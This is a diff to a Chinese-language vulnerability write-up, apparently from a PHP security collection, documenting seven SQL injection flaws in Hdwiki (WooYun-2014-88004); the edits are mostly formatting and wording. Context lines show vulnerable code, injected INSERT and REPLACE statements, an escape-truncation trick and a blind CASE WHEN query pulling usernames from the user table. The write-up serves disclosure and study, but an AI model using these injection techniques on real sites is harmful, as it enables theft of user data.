--- a/論PHP常見的漏洞/0x03-注入/3.35 WooYun-2014-88004：Hdwiki (20141205) 存在7處SQL注入漏洞（含之前處理不當安全的漏洞）.md
+++ b/論PHP常見的漏洞/0x03-注入/3.35 WooYun-2014-88004：Hdwiki (20141205) 存在7處SQL注入漏洞（含之前處理不當安全的漏洞）.md
@@ -2,7 +2,7 @@
 
 ## **詳細說明**
 
-0x01 在control/comment.php 中
+##**0x01 在control/comment.php 中**
 
 ```php
 function doreport(){
@@ -49,7 +49,7 @@ function doreport(){
 
         }
 
-        $comment=$this->db->fetch_by_field('comment','id',$id);// 這裡出了個褲。
+        $comment=$this->db->fetch_by_field('comment','id',$id);// 這裡出了資料。
 
         if(!(bool)$comment){
 
@@ -119,19 +119,18 @@ function send_ownmessage($sendarray){
     }
 ```
 
-`
+<pre>
 詞條的評論（共1條）返回詞條
 
 xiaoyu 時間：12-19 00:47
 
 test'//我們隨便找一個詞條 然後我們自己先去評論一條 這裡評論了test'
 
-     // 然後點擊舉報看看執行的語句INSERT INTO wiki_pms (`from`,`fromid`,`drafts`,`toid`,`to`,`subject`,`message`,`time`,`new`) VALUES ('xiaoyu','2','0','1','admin','評論舉報專用','評論作者：xiaoyu<br/>評論時間：12-19 00:47<br/>評論ID：8<br/>評論詞條名：xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd<br/>評論內容：test'<br/>舉報原因teet','1418921320',1)
+// 然後點擊舉報看看執行的語句INSERT INTO wiki_pms (`from`,`fromid`,`drafts`,`toid`,`to`,`subject`,`message`,`time`,`new`) VALUES ('xiaoyu','2','0','1','admin','評論舉報專用','評論作者：xiaoyu<br/>評論時間：12-19 00:47<br/>評論ID：8<br/>評論詞條名：xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd<br/>評論內容：test'<br/>舉報原因teet','1418921320',1)
 
 評論內容：test' 這裡輸出資料庫了。
-`
-
-
+</pre>
+<br />
 這裡回顯讓我糾結了很久。
 <br />
 ```SQL
@@ -312,6 +311,7 @@ sendto=a%E9%8C%A6%27) or CASE WHEN(substr((select username from wiki_user where 
 當不對應時 直接錯誤。寫個腳本直接跑 很簡單的判斷。
 <br />
 
+---
 
 ## **0x03 control/doc.php中**
 
@@ -365,6 +365,8 @@ function dochangename(){
 
 這個跟上個差不多 就不多說了。
 <br />
+
+---
 
 ## **0x04 control/edition.php**
 
@@ -484,9 +486,9 @@ if($this->setting['checkcode']!=3 && $this->setting['doc_verification_create_cod
             }
 
 			$doc['title']=string::substring(string::stripscript($_ENV['doc']->replace_danger_word(trim($this->post['title']))),0,80);
-            //這里關鍵點 對POST來的截取了字符
+            //這裡關鍵點 對POST來的截取了字符
 
-			//這里大概的意思是 假如說一段代碼截取4個字符 那麼我們就提交一個aaa' 然後轉義成aaa\' 截取字符後就是aaa\ 這裡同理
+			//這裡大概的意思是 假如說一段程式碼截取4個字符 那麼我們就提交一個aaa' 然後轉義成aaa\' 截取字符後就是aaa\ 這裡同理
 
             $_doc=$this->db->fetch_by_field('doc','title',$doc['title']);
 
@@ -541,7 +543,7 @@ if($this->setting['checkcode']!=3 && $this->setting['doc_verification_create_cod
             $doc['summary'] = trim(string::convercharacter(string::substring(strip_tags($doc['summary']),0,100)));//去除換行符號 截斷字串符號
 
             $doc['summary'] = htmlspecialchars(addslashes(stripslashes(string::stripscript(strip_tags($doc['summary'])))));
-            //去除特殊字符 去除javascript代碼
+            //去除特殊字符 去除javascript程式碼
 
             $doc['images']=util::getimagesnum($doc['content']);
 
@@ -611,7 +613,7 @@ if($this->setting['checkcode']!=3 && $this->setting['doc_verification_create_cod
 
             }*/
 
-            $did=$_ENV['doc']->add_doc($doc);//這裡 帶入輸入了
+            $did=$_ENV['doc']->add_doc($doc);//這裡 帶入寫進資料庫了
 
             $_ENV['user']->update_field('creates',$this->user['creates']+1,$this->user['uid']);
 
@@ -686,8 +688,13 @@ VALUES (56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
 ```
 
 一共14個column 換行了後的有8個column 所以我們前面需要接6個column
+<br />
 `56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\','` 這裡是三個 所以我們構造一下
-`56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',',1,1,1` 這樣就是6個了。在1後面還需要構造一個, 為的就是和下面換行了的連接起來 然後再註釋掉這一行後面的那麼最終語句就是
+<br />
+`56,'x','xiaoyuxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxasd\',',1,1,1` 這樣就是6個了。在1後面還需要構造一個, 
+<br />
+為的就是和下面換行了的連接起來 然後再註釋掉這一行後面的那麼最終語句就是
+<br />
 ```sql
 REPLACE INTO wiki_doc
 (did,letter,title,tag ,summary ,content,author,authorid,time,lastedit,lasteditor,lasteditorid,visible,editions)
@@ -800,6 +807,8 @@ Content-Disposition: form-data; name="publishsubmit"
 
 出資料
 
+---
+
 ## **0x07 control/pms.php中**
 
 ```php
@@ -861,10 +870,15 @@ $blackuser = str_replace(",","','",$blacklist);
 
 ![6](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.35/3.35-6.jpg)
 
+<br />
+
 ## **漏洞證明**
+
+<br />
 
 ![7](https://raw.githubusercontent.com/dyeat/PDF/master/%E8%AB%96PHP%E5%B8%B8%E8%A6%8B%E7%9A%84%E6%BC%8F%E6%B4%9E/images/3/3.35/3.35-5.jpg)
 
+<br />
 
 ## **修復方案**
 
